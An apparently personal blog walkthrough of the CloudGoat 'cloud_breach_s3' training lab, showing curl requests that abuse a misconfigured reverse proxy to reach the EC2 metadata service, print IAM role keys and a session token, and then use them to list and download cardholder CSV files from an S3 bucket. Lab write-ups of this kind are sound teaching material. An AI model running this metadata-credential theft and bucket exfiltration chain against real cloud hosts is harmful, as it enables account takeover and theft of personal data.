[Offensive security] Let’s steal the confidential files from the misconfigured S3 bucket.

What we will do in this article

1: setup an initial environment using Docker

2: steal the confidential files from the misconfigured S3 bucket.

overview

Starting as an anonymous outsider with no access or privileges, exploit a misconfigured reverse-proxy server to query the EC2 metadata service and acquire instance profile keys. Then, use those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.

1: setup an initial environment using Docker

[AWS-security]How to gain an admin privilege using CloudGoat

please see how to set up an initial environment here.

Scenario: cloud_breach_s3

The IP Address of an EC2 server that is running a misconfigured reverse proxy

Command: $ ./cloudgoat.py create cloud_breach_s3

Scenario Goal

Download the confidential files from the S3 bucket.

What we know now

cloudgoat_output_aws_account_id = "362364726861"
cloudgoat_output_target_ec2_server_ip = "54.166.247.74"

DEMO

curl http://54.166.247.74

first, lets see what kind of information I can get

<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>bash-5.1#

Based on the information we get, let’s modify the request’s ‘host’ header!

bash-5.1# curl http://54.166.247.74 -H 'Host:169.254.169.254'

1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
2019-10-01
2020-10-27
2021-01-03
2021-03-23
2021-07-15

Instance metadata and user data

Let’s query EC2 metadata service

bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/ -H 'Host:169.254.169.254'

cg-banking-WAF-Role-cgid3qq26zlbnkbash-5.1#

We can get IAM role name now

Let’s get credentials based on this role.

bash-5.1# curl http://54.166.247.74/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cgid3qq26zlbnk -H 'Host:169.254.169.254'
{
  "Code" : "Success",
  "LastUpdated" : "2022-01-17T20:26:57Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAVIXU65ZGWME5OYV3",
  "SecretAccessKey" : "FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd",
  "Token" : "IQoJb3JpZ2luX2VjEK3//////////wEaCXVzLWVhc3QtMSJHMEUCIETZRIuKV4k3FwBtOljx7ZkO/wbgub6zFDlCVlRpyJRqAiEAxJe9zYCizyRgWe7k++V2Sd08P8/LzngysPfzVtdQLJAqgwQIxv//////////ARAAGgwzNjIzNjQ3MjY4NjEiDKaDQQ5lh/+OwODvcSrXA8xo7tQ/5AMDZg/2LO6Y0DFsz87CW50rOXdwAE4Iv1wuCIAvw7ejWOP4FUdPLdaBiF9/MJqALVsyPnj1pdkF0aCUNmNqbq04PWVtvCf7nSm0/AzrdgWinHkqzuMbmr9LViZ38oR7foZGLsD1A795vF6SUF6RdKYE7/4FeeQa8BWNaRGIt5EqViOjpeJdt7Z8lUqeUjhsrW8asrdOA38E9x59x9M1yU+BSqwkcObNnKdTZ8wMkG//axps1t6E5knyeDaRCKavNS8Zt2omNrvMWSKxS6tYKoMhwP/+cNeW8qdg2pRH3Ye5Zls0w2Rj9K7Fb8hYRSmxcSxlozlEidxP06HmfCOf57i6i1+S7g0pQ8lig2h/iULPsiW2RgyJtMmSg3epPXhxCPw0S9IKKJ9LRIeeiNh9BkD5rImXLjNuz2Sa5Ycs1Hq0+wimoNf3vOktWwO2L+R40+Utms6/C25fMhOn4ZiNeJryNO8tZIpb5kGxr1pLPpKI2eZIhkT7ElVIkGP9ZQiAE6Xmv/qSXDLso4aQU9DLWjUkgulGytZM9dQJ9n3OF6ZOTR/SR7g1aM5ia5qVeCVnLloQfrGL7lI3m9LXu4EL7YCT0FixosFzHXxp3m77u3MEBzC0opePBjqlAeQ/2FiLQQMAOJTEZXY7+lVgCIiC45GQY/s4roJ8ZcBT23r56YtyQGSufICoj9fxIQNlDkk/ASRcRGXgjtB2v5qk35jV220kb3X7ub+leexre8/euiXzEy/4hpIueQHnFgROK6x9ox8Ihy3XAuf+63ybQFAZseAHHQ+7ZVPqedyyERNWvwEHvCw6jDImd9jQXXMkFXHVCiZEXYmqL93Oju5Tf8sAxQ==",
  "Expiration" : "2022-01-18T03:02:32Z"
}bash-5.1#

Specially-crafted CURL command is successful, returning the Access Key ID, Secret Access Key, and Session Token of the IAM Instance Profile attached to the EC2 instance.

Lets exploit the stolen credentials

bash-5.1# aws configure --profile hacker
AWS Access Key ID [None]: ASIAVIXU65ZGWME5OYV3
AWS Secret Access Key [None]: FBONy6v+wJatW3akJodEX3D1I1txstAlnLIJbdCd
Default region name [None]: 
Default output format [None]: 
bash-5.1# vi  ~/.aws/credentials
aws_session_token = IQoJb3JpZ2luX2VjEK3//////////wEaCXVzLWVhc3QtMSJHMEUCIETZRIuKV4k3FwBtOljx7ZkO/wbgub6zFDlCVlRpyJRqAiEAxJe9zYCizyRgWe7k++V2Sd08P8/LzngysPfzVtdQLJAqgwQIxv//////////ARAAGgwzNjIzNjQ3MjY4NjEiDKaDQQ5lh/+OwODvcSrXA8xo7tQ/5AMDZg/2LO6Y0DFsz87CW50rOXdwAE4Iv1wuCIAvw7ejWOP4FUdPLdaBiF9/MJqALVsyPnj1pdkF0aCUNmNqbq04PWVtvCf7nSm0/AzrdgWinHkqzuMbmr9LViZ38oR7foZGLsD1A795vF6SUF6RdKYE7/4FeeQa8BWNaRGIt5EqViOjpeJdt7Z8lUqeUjhsrW8asrdOA38E9x59x9M1yU+BSqwkcObNnKdTZ8wMkG//axps1t6E5knyeDaRCKavNS8Zt2omNrvMWSKxS6tYKoMhwP/+cNeW8qdg2pRH3Ye5Zls0w2Rj9K7Fb8hYRSmxcSxlozlEidxP06HmfCOf57i6i1+S7g0pQ8lig2h/iULPsiW2RgyJtMmSg3epPXhxCPw0S9IKKJ9LRIeeiNh9BkD5rImXLjNuz2Sa5Ycs1Hq0+wimoNf3vOktWwO2L+R40+Utms6/C25fMhOn4ZiNeJryNO8tZIpb5kGxr1pLPpKI2eZIhkT7ElVIkGP9ZQiAE6Xmv/qSXDLso4aQU9DLWjUkgulGytZM9dQJ9n3OF6ZOTR/SR7g1aM5ia5qVeCVnLloQfrGL7lI3m9LXu4EL7YCT0FixosFzHXxp3m77u3MEBzC0opePBjqlAeQ/2FiLQQMAOJTEZXY7+lVgCIiC45GQY/s4roJ8ZcBT23r56YtyQGSufICoj9fxIQNlDkk/ASRcRGXgjtB2v5qk35jV220kb3X7ub+leexre8/euiXzEy/4hpIueQHnFgROK6x9ox8Ihy3XAuf+63ybQFAZseAHHQ+7ZVPqedyyERNWvwEHvCw6jDImd9jQXXMkFXHVCiZEXYmqL93Oju5Tf8sAxQ==

With the IAM role’s credentials in hand, we are now able to explore the victim’s cloud environment using the powerful permissions granted to the role.

bash-5.1# aws s3 ls --profile hacker

2022-01-17 20:26:55 cg-cardholder-data-bucket-cgid3qq26zlbnk

Now we can list the s3 buckets

bash-5.1# aws s3 sync s3://cg-cardholder-data-bucket-cgid3qq26zlbnk .  --profile hacker

download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_primary.csv to ./cardholder_data_primary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholder_data_secondary.csv to ./cardholder_data_secondary.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/cardholders_corporate.csv to ./cardholders_corporate.csv
download: s3://cg-cardholder-data-bucket-cgid3qq26zlbnk/goat.png to ./goat.png

We downloaded the credentials from the misconfigured s3 buckets.

bash-5.1# cat cardholder_data_primary.csv 

ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip
287-43-8531,1,Coo

Yes, we did it!!

Cleanup

bash-5.1# ./cloudgoat.py destroy cloud_breach_s3